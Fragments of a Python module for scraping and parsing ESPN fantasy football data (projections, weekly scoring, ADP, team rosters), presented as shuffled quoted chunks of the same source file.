attempts/completions", "k, v in item[\"player\"].items() if k in tl_wanted} for scoring_type in [\"PPR\", \"STANDARD\"]:", "tds[0].text # tds[1]: name/team/pos link, navstr = list(tds[1].children)[0:2] player[\"source_player_name\"] = link.text player[\"source_player_team\"], player[", "weekly scoring page Args: content (str): HTML Returns: list: of dict \"\"\" results", "pos, season_year=None, week=0, offset=0): \"\"\" Gets page with projections by position Args: pos:", "weekly scoring page for dst Args: content(str): HTML Returns: list: of dict \"\"\"", "for dst Args: content(str): HTML Returns: list: of dict \"\"\" # TODO: adapt", "= { \"scoringPeriodId\": week, \"seasonId\": season_year, \"slotCategoryId\": position, } return self.get(url, params=params) class", "= f\"http://www.espn.com/nfl/team/roster/_/name/{team_code}\" return self.get(url, encoding=\"latin1\") def weekly_scoring(self, season_year, week, position): \"\"\" Gets weekly", "link[\"href\"]) if match: player[\"source_player_id\"] = match.group(1) # tds[1]: <td><a href=\"http://www.espn.com/nfl/team/_/ # name/jax/jacksonville-jaguars\"><NAME></a></td> player[\"source_team_name\"]", "td in tds[3:]] for header, val in zip(headers, tds[2].text.split(\"/\") + vals): player[header] =", "\"Atl\", 2: \"Buf\", 3: \"Chi\", 4: \"Cin\", 5: \"Cle\", 6: \"Dal\", 7: \"Den\",", "offset: int 0, 40, 80, etc. Returns: HTML string TODO: revise based on", "\"pass_yds\", \"pass_td\", \"pass_int\", \"rush_att\", \"rush_yds\", \"rush_td\", \"rec_rec\", \"rec_yds\", \"rec_td\", \"rec_tar\", \"tpc\", \"fumble\", \"misc_td\",", "try: api_player[key] = item[\"player\"][\"draftRanksByRankType\"][ scoring_type ][rank_type] except KeyError: api_player[key] = None vals.append(api_player) return", "# will have to revisit this module as season approaches \"\"\" import logging", "vals = [] for item in content[\"players\"]: tl_wanted = [ \"defaultPositionId\", \"firstName\", \"id\",", "of espn nfl team roster page Returns: list of dict \"\"\" players =", "\"\"\" players = [] soup = BeautifulSoup(content, \"lxml\") for row in soup.find_all(\"tr\"): class_matches", "Parses weekly scoring page for dst Args: content(str): HTML Returns: list: of dict", "team_code: str 'DEN', 'BUF', etc. Returns: HTML string \"\"\" url = f\"http://www.espn.com/nfl/team/roster/_/name/{team_code}\" return", "\"D/ST\" return pos.upper() else: raise ValueError(\"invalid position: {}\".format(pos)) def adp(self, season_year): \"\"\" Gets", "\"evenrow\"]) classes = set(row.attrs.get(\"class\", [])) if class_matches.intersection(classes): player = {\"source\": \"espn\", \"source_player_position\": pos}", "raise ValueError(\"invalid offset {}\".format(offset)) if offset % 40 > 0: raise ValueError(\"invalid offset", "= tds[1].text link = row.find(\"a\", {\"href\": re.compile(r\"/team/_/name\")}) if link: match = re.search(r\"name/(\\w+)/\", link[\"href\"])", "pos.lower() == \"k\": for row in soup.findAll(\"tr\", {\"class\": \"pncPlayerRow\"}): player = {\"source\": \"espn\"}", "\"\"\" # TODO: adapt for dst results = [] headers = [ \"c_a\",", "] soup = BeautifulSoup(content, \"lxml\") tbl = soup.select(\"table#playertable_0\")[0] for row in tbl.find_all(\"tr\", {\"id\":", "player[\"source_player_name\"] = link.text player[\"source_player_id\"] = link[\"href\"].split(\"/\")[-2] players.append(player) except ValueError: pass return players @staticmethod", "list: of dict \"\"\" # TODO: adapt for dst results = [] headers", "offset} if week: params[\"scoringPeriodId\"] = week else: params[\"seasonTotals\"] = \"true\" return self.get(url, params=params,", "= \"true\" return self.get(url, params=params, encoding=\"latin1\") def team_roster(self, team_code): \"\"\" Gets list of", "url = \"http://www.espn.com/nfl/players?position={}&league=nfl\" return self.get(url.format(pos), encoding=\"latin1\") def projections(self, pos, season_year=None, week=0, offset=0): \"\"\"", "list of dict \"\"\" players = [] soup = BeautifulSoup(content, \"lxml\") if pos.lower()", "loop through stats # they have attempts/completions in one column so have to", "Returns: str: HTML TODO: rework for new URL \"\"\" poscode = {\"qb\": 0,", "\"qb\", \"rb\", \"wr\", \"te\", \"dst\", \"d/st\", \"k\", \"QB\", \"RB\", \"WR\", \"TE\", \"K\", \"D/ST\",", "(int): 1 through 17 position (str): 'qb', 'wr', etc. Returns: str: HTML TODO:", "\"DST\", ]: if pos in [\"DST\", \"dst\"]: pos = \"D/ST\" return pos.upper() else:", "re.compile(r\"/nfl/player/_/id/\")}) try: player = {\"source\": \"espn\"} tds = row.find_all(\"td\") if len(tds) != 8:", "player[\"source_player_team\"], player[ \"source_player_position\" ] = child.string.split()[1:3] elif isinstance(child, Tag): player[\"source_player_name\"] = child.string player[\"source_player_id\"]", "except KeyError: api_player[key] = None vals.append(api_player) return vals def projections(self, content, pos): \"\"\"", "revisit this module as season approaches \"\"\" import logging import re from bs4", "self._p = Parser() def adp(self, season_year): \"\"\" Gets season ADP data Args: season_year(int):", "Tag from namematcher.xref import Site from sportscraper.scraper import RequestScraper FANTASY_TEAMS = { 1:", "dict Args: content: HTML of espn nfl team roster page Returns: list of", "sportscraper.scraper import RequestScraper FANTASY_TEAMS = { 1: \"Atl\", 2: \"Buf\", 3: \"Chi\", 4:", "new URL \"\"\" pos = pos.lower() slot_categories = {\"qb\": 0, \"rb\": 2, \"wr\":", "dict \"\"\" # TODO: adapt for kicker results = [] headers = [", "scoring page Args: content (str): HTML Returns: list: of dict \"\"\" results =", "FANTASY_TEAMS = { 1: \"Atl\", 2: \"Buf\", 3: \"Chi\", 4: \"Cin\", 5: \"Cle\",", "https://fantasy.espn.com/football/leaders url = \"http://games.espn.com/ffl/leaders?&\" params = { \"scoringPeriodId\": week, \"seasonId\": season_year, \"slotCategoryId\": position,", "\"\"\" players = [] soup = BeautifulSoup(content, \"lxml\") if pos.lower() in [\"qb\", \"rb\",", "weekly_scoring_k(content): \"\"\" Parses weekly scoring page for kickers Args: content (str): HTML Returns:", "\"slotCategoryId\": position, } return self.get(url, params=params) class Parser: \"\"\" Parse ESPN.com for football", "tbl.find_all(\"tr\", {\"id\": re.compile(r\"plyr\")}): tds = [td.text for td in row.find_all(\"td\", class_=\"playertableStat\")] if tds:", "= [self._val(td.text) for td in tds[3:]] for header, val in zip(headers, tds[2].text.split(\"/\") +", "= [td.text for td in row.find_all(\"td\", class_=\"playertableStat\")] if tds: player = dict(zip(headers, tds))", "( f\"http://fantasy.espn.com/apis/v3/games/ffl/seasons/{season_year}/\" f\"segments/0/leaguedefaults/1?view=kona_player_info\" ) return self.get_json(url) def players_position(self, pos): \"\"\" Gets page with", "pos): \"\"\" Gets page with all players by position Args: pos(str): qb, rb,", "16, \"k\": 17} if position.lower() not in poscode: raise ValueError(\"invalid position: {}\".format(position)) #", "[])) if class_matches.intersection(classes): player = {\"source\": \"espn\", \"source_player_position\": pos} tds = row.find_all(\"td\") #", "etc. season_year: int 2017, 2016 week: int 1, 2, 3 offset: int 0,", "list of NFL players from ESPN.com Args: team_code: str 'DEN', 'BUF', etc. Returns:", "\"dst\": 16, \"k\": 17} if position.lower() not in poscode: raise ValueError(\"invalid position: {}\".format(position))", "tds[0].text link = row.find(\"a\", {\"href\": re.compile(r\"/player/_/\")}) if link: match = re.search(r\"\\/id\\/([0-9]+)\", link[\"href\"]) if", "if link: match = re.search(r\"\\/id\\/([0-9]+)\", link[\"href\"]) if match: player[\"source_player_id\"] = match.group(1) # tds[1]:", "default None parser(espn.Parser): default None cache_name(str): default 'espn-agent' \"\"\" logging.getLogger(__name__).addHandler(logging.NullHandler()) if scraper: self._s", "row in tbl.find_all(\"tr\", {\"id\": re.compile(r\"plyr\")}): tds = [td.text for td in row.find_all(\"td\", class_=\"playertableStat\")]", "for kicker results = [] headers = [ \"c_a\", \"pass_yds\", \"pass_td\", \"pass_int\", \"rush_att\",", "return self.get(url, encoding=\"latin1\") def weekly_scoring(self, season_year, week, position): \"\"\" Gets weekly fantasy scoring", "16: \"Min\", 17: \"NE\", 18: \"NO\", 19: \"NYG\", 20: \"NYJ\", 21: \"Phi\", 22:", "[ \"pass_att\", \"pass_cmp\", \"pass_yds\", \"pass_td\", \"pass_int\", \"rush_att\", \"rush_yds\", \"rush_td\", \"rec\", \"rec_yds\", \"rec_td\", \"fantasy_points_ppr\",", "\"rb\", \"wr\", \"te\", \"flex\"]: headers = [ \"pass_att\", \"pass_cmp\", \"pass_yds\", \"pass_td\", \"pass_int\", \"rush_att\",", "class_=\"playertableStat\")] if tds: player = dict(zip(headers, tds)) # name, team, position nametd =", "= child.string player[\"source_player_id\"] = child.attrs.get(\"playerid\") results.append(player) return results @staticmethod def weekly_scoring_dst(content): \"\"\" Parses", "= \"http://games.espn.com/ffl/tools/projections?\" if season_year: params = { \"slotCategoryId\": slot_categories[pos], \"startIndex\": offset, \"seasonId\": season_year,", "wr, te, k, etc. Returns: str \"\"\" url = \"http://www.espn.com/nfl/players?position={}&league=nfl\" return self.get(url.format(pos), encoding=\"latin1\")", "link.attrs.get(\"playerid\") # loop through stats # they have attempts/completions in one column so", "roster page Returns: list of dict \"\"\" players = [] soup = BeautifulSoup(content,", "tds[1]: name/team/pos link, navstr = list(tds[1].children)[0:2] player[\"source_player_name\"] = link.text player[\"source_player_team\"], player[ \"source_player_position\" ]", "\"dst\"]: pos = \"D/ST\" return pos.upper() else: raise ValueError(\"invalid position: {}\".format(pos)) def adp(self,", "\"pass_int\", \"rush_att\", \"rush_yds\", \"rush_td\", \"rec\", \"rec_yds\", \"rec_td\", \"fantasy_points_ppr\", ] for row in soup.findAll(\"tr\",", "in offseason # will have to revisit this module as season approaches \"\"\"", "\"\"\" # TODO: adapt for kicker results = [] headers = [ \"c_a\",", "return val @staticmethod def adp(content): \"\"\" Parses season-long ADP Args: content: Returns: list", "\"fantasy_points_ppr\", ] for row in soup.findAll(\"tr\", {\"class\": \"pncPlayerRow\"}): player = {\"source\": \"espn\"} tds", "ValueError(\"invalid position: {}\".format(position)) # https://fantasy.espn.com/football/leaders url = \"http://games.espn.com/ffl/leaders?&\" params = { \"scoringPeriodId\": week,", "8: continue player[\"source_player_position\"] = tds[2].text player[\"source_player_name\"] = link.text player[\"source_player_id\"] = link[\"href\"].split(\"/\")[-2] players.append(player) except", "etc. Returns: list: of dict \"\"\" content = self._s.adp(season_year) return self._p.adp(content) class Xref(Site):", "\"\"\" # espn.py # classes for scraping, parsing espn football data # this", "position: {}\".format(position)) # https://fantasy.espn.com/football/leaders url = \"http://games.espn.com/ffl/leaders?&\" params = { \"scoringPeriodId\": week, \"seasonId\":", "Converts non-numeric value to numeric 0 Args: val: Returns: number \"\"\" if \"--\"", "players = [] soup = BeautifulSoup(content, \"lxml\") if pos.lower() in [\"qb\", \"rb\", \"wr\",", "isinstance(child, NavigableString): player[\"source_player_team\"], player[ \"source_player_position\" ] = child.string.split()[1:3] elif isinstance(child, Tag): player[\"source_player_name\"] =", "\"Pit\", 24: \"LAC\", 25: \"SF\", 26: \"Sea\", 27: \"TB\", 28: \"Wsh\", 29: \"Car\",", "\"wr\": 4, \"te\": 6, \"dst\": 16, \"k\": 17} if position.lower() not in poscode:", "espn nfl team roster page Returns: list of dict \"\"\" players = []", "__init__(self, scraper=None, parser=None, cache_name=\"espn-agent\"): \"\"\" Creates Agent object Args: scraper(espn.Scraper): default None parser(espn.Parser):", "0 return val @staticmethod def adp(content): \"\"\" Parses season-long ADP Args: content: Returns:", "Parses weekly scoring page Args: content (str): HTML Returns: list: of dict \"\"\"", "on new URL \"\"\" pos = pos.lower() slot_categories = {\"qb\": 0, \"rb\": 2,", "\"\"\" Gets weekly fantasy scoring page Args: season_year (int): 2017, 2016, etc. week", "list of player dict Args: content: HTML of espn nfl team roster page", "# https://fantasy.espn.com/football/leaders url = \"http://games.espn.com/ffl/leaders?&\" params = { \"scoringPeriodId\": week, \"seasonId\": season_year, \"slotCategoryId\":", "Tag): player[\"source_player_name\"] = child.string player[\"source_player_id\"] = child.attrs.get(\"playerid\") results.append(player) return results @staticmethod def weekly_scoring_dst(content):", "\"k\": 17} if position.lower() not in poscode: raise ValueError(\"invalid position: {}\".format(position)) # https://fantasy.espn.com/football/leaders", "= week else: params[\"seasonTotals\"] = \"true\" return self.get(url, params=params, encoding=\"latin1\") def team_roster(self, team_code):", "\"scoringPeriodId\": week, \"seasonId\": season_year, \"slotCategoryId\": position, } return self.get(url, params=params) class Parser: \"\"\"", "position: {}\".format(pos)) def adp(self, season_year): \"\"\" Gets adp data Args: season_year(int): 2019, etc.", "# name, team, position nametd = row.find(\"td\", {\"id\": re.compile(r\"playername\")}) for child in nametd.children:", "is mostly about managing fantasy teams # NOTE: trouble accessing data in offseason", "list: of dict \"\"\" players = [] soup = BeautifulSoup(content, \"lxml\") for row", "as season approaches \"\"\" import logging import re from bs4 import BeautifulSoup, NavigableString,", "\"NO\", 19: \"NYG\", 20: \"NYJ\", 21: \"Phi\", 22: \"Ari\", 23: \"Pit\", 24: \"LAC\",", "Gets page with projections by position Args: pos: str qb, rb, wr, te,", "\"wr\": 4, \"te\": 6, \"dst\": 16, \"k\": 17} max_offset = {\"qb\": 120, \"rb\":", "if pos not in slot_categories.keys(): raise ValueError(\"invalid pos {}\".format(pos)) if offset > max_offset.get(pos):", "= row.find(\"a\", {\"href\": re.compile(r\"/nfl/player/_/id/\")}) try: player = {\"source\": \"espn\"} tds = row.find_all(\"td\") if", "def _check_pos(pos): \"\"\" Makes sure pos is valid and uppercase Args: pos(str): Returns:", "import BeautifulSoup, NavigableString, Tag from namematcher.xref import Site from sportscraper.scraper import RequestScraper FANTASY_TEAMS", "list: of dict \"\"\" results = [] headers = [ \"c_a\", \"pass_yds\", \"pass_td\",", "have to revisit this module as season approaches \"\"\" import logging import re", "return vals def projections(self, content, pos): \"\"\" Parses ESPN fantasy football season-long sortable", "{\"href\": re.compile(r\"/nfl/player/_/id/\")}) try: player = {\"source\": \"espn\"} tds = row.find_all(\"td\") if len(tds) !=", "this does include some basic fantasy data # espn_fantasy is mostly about managing", "\"\"\" Combines common scraping/parsing tasks \"\"\" def __init__(self, scraper=None, parser=None, cache_name=\"espn-agent\"): \"\"\" Creates", "common scraping/parsing tasks \"\"\" def __init__(self, scraper=None, parser=None, cache_name=\"espn-agent\"): \"\"\" Creates Agent object", "return results class Agent: \"\"\" Combines common scraping/parsing tasks \"\"\" def __init__(self, scraper=None,", "if pos in [ \"qb\", \"rb\", \"wr\", \"te\", \"dst\", \"d/st\", \"k\", \"QB\", \"RB\",", "in poscode: raise ValueError(\"invalid position: {}\".format(position)) # https://fantasy.espn.com/football/leaders url = \"http://games.espn.com/ffl/leaders?&\" params =", "season_year: int 2017, 2016 week: int 1, 2, 3 offset: int 0, 40,", "def projections(self, content, pos): \"\"\" Parses ESPN fantasy football season-long sortable projections page", "v in item[\"player\"].items() if k in tl_wanted} for scoring_type in [\"PPR\", \"STANDARD\"]: for", "soup = BeautifulSoup(content, \"lxml\") for row in soup.find_all(\"tr\"): class_matches = set([\"oddrow\", \"evenrow\"]) classes", "Returns: number \"\"\" if \"--\" in val: return 0 return val @staticmethod def", "\"RB\", \"WR\", \"TE\", \"K\", \"D/ST\", \"DST\", ]: if pos in [\"DST\", \"dst\"]: pos", "dst results = [] headers = [ \"c_a\", \"pass_yds\", \"pass_td\", \"pass_int\", \"rush_att\", \"rush_yds\",", "\"espn\"} tds = row.find_all(\"td\") # tds[0]: rank player[\"source_position_rank\"] = tds[0].text # tds[1]: name/team/pos", "30: \"Jax\", 33: \"Bal\", 34: \"Hou\", } class Scraper(RequestScraper): \"\"\" Scrape ESPN.com for", "scoring page for dst Args: content(str): HTML Returns: list: of dict \"\"\" #", "data Args: season_year(int): 2019, etc. Returns: dict: parsed JSON \"\"\" url = (", "dict \"\"\" vals = [] for item in content[\"players\"]: tl_wanted = [ \"defaultPositionId\",", "ValueError(\"invalid offset {}\".format(offset)) if offset % 40 > 0: raise ValueError(\"invalid offset {}\".format(offset))", "tds = row.find_all(\"td\") # tds[0]: <a href=\"http://www.espn.com/nfl/player/_/id/ # 2574511/brandon-allen\"><NAME></a> player[\"source_player_name\"] = tds[0].text link", "val in zip(headers, tds[2].text.split(\"/\") + vals): player[header] = val players.append(player) elif pos.lower() ==", "= [] soup = BeautifulSoup(content, \"lxml\") for row in soup.find_all(\"tr\"): class_matches = set([\"oddrow\",", "= [ \"defaultPositionId\", \"firstName\", \"id\", \"lastName\", \"proTeamId\", ] api_player = {k: v for", "\"c_a\", \"pass_yds\", \"pass_td\", \"pass_int\", \"rush_att\", \"rush_yds\", \"rush_td\", \"rec_rec\", \"rec_yds\", \"rec_td\", \"rec_tar\", \"tpc\", \"fumble\",", "players.append(player) else: pass return players @staticmethod def players_position(content, pos): \"\"\" Parses page of", "re.compile(r\"plyr\")}): tds = [td.text for td in row.find_all(\"td\", class_=\"playertableStat\")] if tds: player =", "bs4 import BeautifulSoup, NavigableString, Tag from namematcher.xref import Site from sportscraper.scraper import RequestScraper", "page for dst Args: content(str): HTML Returns: list: of dict \"\"\" # TODO:", "\"firstName\", \"id\", \"lastName\", \"proTeamId\", ] api_player = {k: v for k, v in", "= [] soup = BeautifulSoup(content, \"lxml\") for row in soup.find_all(\"tr\"): link = row.find(\"a\",", "classes for scraping, parsing espn football data # this does include some basic", "not in poscode: raise ValueError(\"invalid position: {}\".format(position)) # https://fantasy.espn.com/football/leaders url = \"http://games.espn.com/ffl/leaders?&\" params", "Returns: dict: parsed JSON \"\"\" url = ( f\"http://fantasy.espn.com/apis/v3/games/ffl/seasons/{season_year}/\" f\"segments/0/leaguedefaults/1?view=kona_player_info\" ) return self.get_json(url)", "13: \"Oak\", 14: \"LAR\", 15: \"Mia\", 16: \"Min\", 17: \"NE\", 18: \"NO\", 19:", "val: return 0 return val @staticmethod def adp(content): \"\"\" Parses season-long ADP Args:", "content: HTML of espn nfl team roster page Returns: list of dict \"\"\"", "\"fumble\", \"misc_td\", \"fpts\", ] soup = BeautifulSoup(content, \"lxml\") tbl = soup.select(\"table#playertable_0\")[0] for row", "0 Args: val: Returns: number \"\"\" if \"--\" in val: return 0 return", "they have attempts/completions in one column so have to remove & split player[\"fantasy_points_ppr\"]", "\"\"\" \"\"\" logging.getLogger(__name__).addHandler(logging.NullHandler()) @staticmethod def _val(val): \"\"\" Converts non-numeric value to numeric 0", "fantasy football season-long sortable projections page Args: content: HTML string Returns: list of", "self._p.adp(content) class Xref(Site): \"\"\" Cross-reference source players with other names/ids \"\"\" def __init__(self,", "row.find(\"td\", {\"id\": re.compile(r\"playername\")}) for child in nametd.children: if isinstance(child, NavigableString): player[\"source_player_team\"], player[ \"source_player_position\"", "offset {}\".format(offset)) # https://fantasy.espn.com/football/players/projections url = \"http://games.espn.com/ffl/tools/projections?\" if season_year: params = { \"slotCategoryId\":", "__init__(self, source_name=\"espn\"): \"\"\" Args: source_name(str): either 'espn' or 'espn_fantasy' \"\"\" super().__init__() self.source_name =", "so have to remove & split player[\"fantasy_points_ppr\"] = self._val(tds[-1].text) players.append(player) else: pass return", "results @staticmethod def weekly_scoring_k(content): \"\"\" Parses weekly scoring page for kickers Args: content", "pos = pos.lower() slot_categories = {\"qb\": 0, \"rb\": 2, \"wr\": 4, \"te\": 6,", "\"rush_yds\", \"rush_td\", \"rec\", \"rec_yds\", \"rec_td\", \"fantasy_points_ppr\", ] for row in soup.findAll(\"tr\", {\"class\": \"pncPlayerRow\"}):", "+ \"_\" + rank_type try: api_player[key] = item[\"player\"][\"draftRanksByRankType\"][ scoring_type ][rank_type] except KeyError: api_player[key]", "= item[\"player\"][\"draftRanksByRankType\"][ scoring_type ][rank_type] except KeyError: api_player[key] = None vals.append(api_player) return vals def", "re.search(r\"name/(\\w+)/\", link[\"href\"]) if match: player[\"source_team_code\"] = match.group(1) # tds[2]: <td>Arkansas</td> player[\"college\"] = tds[2].text", "\"http://games.espn.com/ffl/tools/projections?\" if season_year: params = { \"slotCategoryId\": slot_categories[pos], \"startIndex\": offset, \"seasonId\": season_year, }", "ESPN.com for football stats \"\"\" def __init__(self): \"\"\" \"\"\" logging.getLogger(__name__).addHandler(logging.NullHandler()) @staticmethod def _val(val):", "Returns: list of dict \"\"\" vals = [] for item in content[\"players\"]: tl_wanted", "so have to remove & split vals = [self._val(td.text) for td in tds[3:]]", "tl_wanted} for scoring_type in [\"PPR\", \"STANDARD\"]: for rank_type in [\"rank\", \"auctionValue\"]: key =", "content: HTML string Returns: list of dict \"\"\" players = [] soup =", "projections page Args: content: HTML string Returns: list of dict \"\"\" players =", "header, val in zip(headers, tds[2].text.split(\"/\") + vals): player[header] = val players.append(player) elif pos.lower()", "dict \"\"\" # TODO: adapt for dst results = [] headers = [", "\"http://www.espn.com/nfl/players?position={}&league=nfl\" return self.get(url.format(pos), encoding=\"latin1\") def projections(self, pos, season_year=None, week=0, offset=0): \"\"\" Gets page", "all players by position Args: pos(str): qb, rb, wr, te, k, etc. Returns:", "& split vals = [self._val(td.text) for td in tds[3:]] for header, val in", "\"\"\" Converts non-numeric value to numeric 0 Args: val: Returns: number \"\"\" if", "\"dst\": 0, \"k\": 40} if pos not in slot_categories.keys(): raise ValueError(\"invalid pos {}\".format(pos))", "\"Cin\", 5: \"Cle\", 6: \"Dal\", 7: \"Den\", 8: \"Det\", 9: \"GB\", 10: \"Ten\",", "encoding=\"latin1\") def projections(self, pos, season_year=None, week=0, offset=0): \"\"\" Gets page with projections by", "content (str): HTML Returns: list: of dict \"\"\" # TODO: adapt for kicker", "if k in tl_wanted} for scoring_type in [\"PPR\", \"STANDARD\"]: for rank_type in [\"rank\",", "week, \"seasonId\": season_year, \"slotCategoryId\": position, } return self.get(url, params=params) class Parser: \"\"\" Parse", "week, position): \"\"\" Gets weekly fantasy scoring page Args: season_year (int): 2017, 2016,", "val players.append(player) elif pos.lower() == \"k\": for row in soup.findAll(\"tr\", {\"class\": \"pncPlayerRow\"}): player", "= {\"source\": \"espn\"} tds = row.find_all(\"td\") if len(tds) != 8: continue player[\"source_player_position\"] =", "return players @staticmethod def weekly_scoring(content): \"\"\" Parses weekly scoring page Args: content (str):", "\"rush_att\", \"rush_yds\", \"rush_td\", \"rec_rec\", \"rec_yds\", \"rec_td\", \"rec_tar\", \"tpc\", \"fumble\", \"misc_td\", \"fpts\", ] soup", "tds = [td.text for td in row.find_all(\"td\", class_=\"playertableStat\")] if tds: player = dict(zip(headers,", "have attempts/completions in one column so have to remove & split player[\"fantasy_points_ppr\"] =", "{}\".format(pos)) def adp(self, season_year): \"\"\" Gets adp data Args: season_year(int): 2019, etc. Returns:", "= self._val(tds[-1].text) players.append(player) else: pass return players @staticmethod def players_position(content, pos): \"\"\" Parses", "'espn-agent' \"\"\" logging.getLogger(__name__).addHandler(logging.NullHandler()) if scraper: self._s = scraper else: self._s = Scraper(cache_name=cache_name) if", "if tds: player = dict(zip(headers, tds)) # name, team, position nametd = row.find(\"td\",", "if offset % 40 > 0: raise ValueError(\"invalid offset {}\".format(offset)) # https://fantasy.espn.com/football/players/projections url", "Args: season_year(int): 2019, etc. Returns: dict: parsed JSON \"\"\" url = ( f\"http://fantasy.espn.com/apis/v3/games/ffl/seasons/{season_year}/\"", "list: of dict \"\"\" content = self._s.adp(season_year) return self._p.adp(content) class Xref(Site): \"\"\" Cross-reference", "= child.string.split()[1:3] elif isinstance(child, Tag): player[\"source_player_name\"] = child.string player[\"source_player_id\"] = child.attrs.get(\"playerid\") results.append(player) return", "football data # this does include some basic fantasy data # espn_fantasy is", "pos(str): qb, rb, wr, te, k, etc. Returns: str \"\"\" url = \"http://www.espn.com/nfl/players?position={}&league=nfl\"", "raise ValueError(\"invalid offset {}\".format(offset)) # https://fantasy.espn.com/football/players/projections url = \"http://games.espn.com/ffl/tools/projections?\" if season_year: params =", "= BeautifulSoup(content, \"lxml\") for row in soup.find_all(\"tr\"): class_matches = set([\"oddrow\", \"evenrow\"]) classes =", "self.get(url, params=params) class Parser: \"\"\" Parse ESPN.com for football stats \"\"\" def __init__(self):", "of dict \"\"\" # TODO: adapt for kicker results = [] headers =", "# https://fantasy.espn.com/football/players/projections url = \"http://games.espn.com/ffl/tools/projections?\" if season_year: params = { \"slotCategoryId\": slot_categories[pos], \"startIndex\":", "\"\"\" import logging import re from bs4 import BeautifulSoup, NavigableString, Tag from namematcher.xref", "return self.get(url.format(pos), encoding=\"latin1\") def projections(self, pos, season_year=None, week=0, offset=0): \"\"\" Gets page with", "360, \"te\": 160, \"dst\": 0, \"k\": 40} if pos not in slot_categories.keys(): raise", "players.append(player) elif pos.lower() == \"k\": for row in soup.findAll(\"tr\", {\"class\": \"pncPlayerRow\"}): player =", "= Parser() def adp(self, season_year): \"\"\" Gets season ADP data Args: season_year(int): 2018,", "vals def projections(self, content, pos): \"\"\" Parses ESPN fantasy football season-long sortable projections", "rb, wr, te, k, etc. Returns: str \"\"\" url = \"http://www.espn.com/nfl/players?position={}&league=nfl\" return self.get(url.format(pos),", "poscode: raise ValueError(\"invalid position: {}\".format(position)) # https://fantasy.espn.com/football/leaders url = \"http://games.espn.com/ffl/leaders?&\" params = {", "of dict \"\"\" vals = [] for item in content[\"players\"]: tl_wanted = [", "\"wr\", \"te\", \"dst\", \"d/st\", \"k\", \"QB\", \"RB\", \"WR\", \"TE\", \"K\", \"D/ST\", \"DST\", ]:", "self._s = Scraper(cache_name=cache_name) if parser: self._p = parser else: self._p = Parser() def", "cache_name=\"espn-agent\"): \"\"\" Creates Agent object Args: scraper(espn.Scraper): default None parser(espn.Parser): default None cache_name(str):", "\"true\" return self.get(url, params=params, encoding=\"latin1\") def team_roster(self, team_code): \"\"\" Gets list of NFL", "\"pass_td\", \"pass_int\", \"rush_att\", \"rush_yds\", \"rush_td\", \"rec\", \"rec_yds\", \"rec_td\", \"fantasy_points_ppr\", ] for row in", "\"lxml\") for row in soup.find_all(\"tr\"): link = row.find(\"a\", {\"href\": re.compile(r\"/nfl/player/_/id/\")}) try: player =", "in tbl.find_all(\"tr\", {\"id\": re.compile(r\"plyr\")}): tds = [td.text for td in row.find_all(\"td\", class_=\"playertableStat\")] if", "source players with other names/ids \"\"\" def __init__(self, source_name=\"espn\"): \"\"\" Args: source_name(str): either", "<td><a href=\"http://www.espn.com/nfl/team/_/ # name/jax/jacksonville-jaguars\"><NAME></a></td> player[\"source_team_name\"] = tds[1].text link = row.find(\"a\", {\"href\": re.compile(r\"/team/_/name\")}) if", "if isinstance(child, NavigableString): player[\"source_player_team\"], player[ \"source_player_position\" ] = child.string.split()[1:3] elif isinstance(child, Tag): player[\"source_player_name\"]", "= child.string player[\"source_player_id\"] = child.attrs.get(\"playerid\") results.append(player) return results @staticmethod def weekly_scoring_k(content): \"\"\" Parses", "Scrape ESPN.com for football stats \"\"\" @staticmethod def _check_pos(pos): \"\"\" Makes sure pos", "pos = \"D/ST\" return pos.upper() else: raise ValueError(\"invalid position: {}\".format(pos)) def adp(self, season_year):", "player[\"fantasy_points_ppr\"] = self._val(tds[-1].text) players.append(player) else: pass return players @staticmethod def players_position(content, pos): \"\"\"", "url = f\"http://www.espn.com/nfl/team/roster/_/name/{team_code}\" return self.get(url, encoding=\"latin1\") def weekly_scoring(self, season_year, week, position): \"\"\" Gets", "one column so have to remove & split player[\"fantasy_points_ppr\"] = self._val(tds[-1].text) players.append(player) else:", "of dict \"\"\" players = [] soup = BeautifulSoup(content, \"lxml\") if pos.lower() in", "match.group(1) # tds[2]: <td>Arkansas</td> player[\"college\"] = tds[2].text # add to list players.append(player) return", "ADP data Args: season_year(int): 2018, 2019, etc. Returns: list: of dict \"\"\" content", "\"STANDARD\"]: for rank_type in [\"rank\", \"auctionValue\"]: key = scoring_type.lower() + \"_\" + rank_type", "RequestScraper FANTASY_TEAMS = { 1: \"Atl\", 2: \"Buf\", 3: \"Chi\", 4: \"Cin\", 5:", "!= 8: continue player[\"source_player_position\"] = tds[2].text player[\"source_player_name\"] = link.text player[\"source_player_id\"] = link[\"href\"].split(\"/\")[-2] players.append(player)", "def projections(self, pos, season_year=None, week=0, offset=0): \"\"\" Gets page with projections by position", "\"fpts\", ] soup = BeautifulSoup(content, \"lxml\") tbl = soup.select(\"table#playertable_0\")[0] for row in tbl.find_all(\"tr\",", "attempts/completions in one column so have to remove & split player[\"fantasy_points_ppr\"] = self._val(tds[-1].text)", "player[\"source_player_id\"] = child.attrs.get(\"playerid\") results.append(player) return results @staticmethod def weekly_scoring_dst(content): \"\"\" Parses weekly scoring", "ESPN.com Args: team_code: str 'DEN', 'BUF', etc. Returns: HTML string \"\"\" url =", "\"Ten\", 11: \"Ind\", 12: \"KC\", 13: \"Oak\", 14: \"LAR\", 15: \"Mia\", 16: \"Min\",", "return pos.upper() else: raise ValueError(\"invalid position: {}\".format(pos)) def adp(self, season_year): \"\"\" Gets adp", "\"misc_td\", \"fpts\", ] soup = BeautifulSoup(content, \"lxml\") tbl = soup.select(\"table#playertable_0\")[0] for row in", "1: \"Atl\", 2: \"Buf\", 3: \"Chi\", 4: \"Cin\", 5: \"Cle\", 6: \"Dal\", 7:", "= ( f\"http://fantasy.espn.com/apis/v3/games/ffl/seasons/{season_year}/\" f\"segments/0/leaguedefaults/1?view=kona_player_info\" ) return self.get_json(url) def players_position(self, pos): \"\"\" Gets page", "headers = [ \"pass_att\", \"pass_cmp\", \"pass_yds\", \"pass_td\", \"pass_int\", \"rush_att\", \"rush_yds\", \"rush_td\", \"rec\", \"rec_yds\",", "= tds[2].text # add to list players.append(player) return players @staticmethod def team_roster(content): \"\"\"", "players @staticmethod def players_position(content, pos): \"\"\" Parses page of ESPN players by position", "= link.attrs.get(\"playerid\") # loop through stats # they have attempts/completions in one column", "return results @staticmethod def weekly_scoring_dst(content): \"\"\" Parses weekly scoring page for dst Args:", "JSON \"\"\" url = ( f\"http://fantasy.espn.com/apis/v3/games/ffl/seasons/{season_year}/\" f\"segments/0/leaguedefaults/1?view=kona_player_info\" ) return self.get_json(url) def players_position(self, pos):", "= 